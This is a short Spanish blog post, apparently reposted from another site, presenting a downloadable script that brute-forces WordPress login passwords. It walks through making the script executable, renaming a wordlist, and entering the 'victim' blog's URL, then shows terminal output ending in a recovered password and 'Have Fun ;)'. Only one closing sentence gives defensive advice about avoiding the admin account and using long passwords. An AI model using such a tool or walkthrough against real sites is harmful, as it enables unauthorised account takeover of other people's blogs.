Zerialkiller pone a disposición nuestra un script que por fuerza bruta permite obtener el password de los blogs montados sobre wordpress.

wp-bruteforce

Lo descargamos y le damos permisos de ejecución.
 chmod +x wp-bruteforce

Nos hacemos de un diccionario de palabras y lo renombramos como bf_passwords . Ahora ejecutamos el script y nos pedirá la dirección de la victima.

lesthack@lesthack-laptop:~$ ./wp-bruteforcer
.::Wordpress BruteForce By 0x90::.
use a good dictioary rename it to bf_passwordsEnter website with full path to wordpress: http://blogwordpress.com/trying
passwordtrying password
!trying password
!trying password
!!trying password
!!2004trying

password !@#$%......

Bengo WebSite http://blogwordpress.com/ password is: 02032Have Fun ;)

Una forma de protegernos es no utilizar la cuenta por default llamada admin , y si lo hacemos, establecer un password de una longitud mayor a 12 caracteres, incluyendo letras, números y símbolos.

Via: ZerialKiller

Jorge Hernandez :: http://jorgeluis.com.mx

    Animation Killer TuxEl Devorador del Tiempo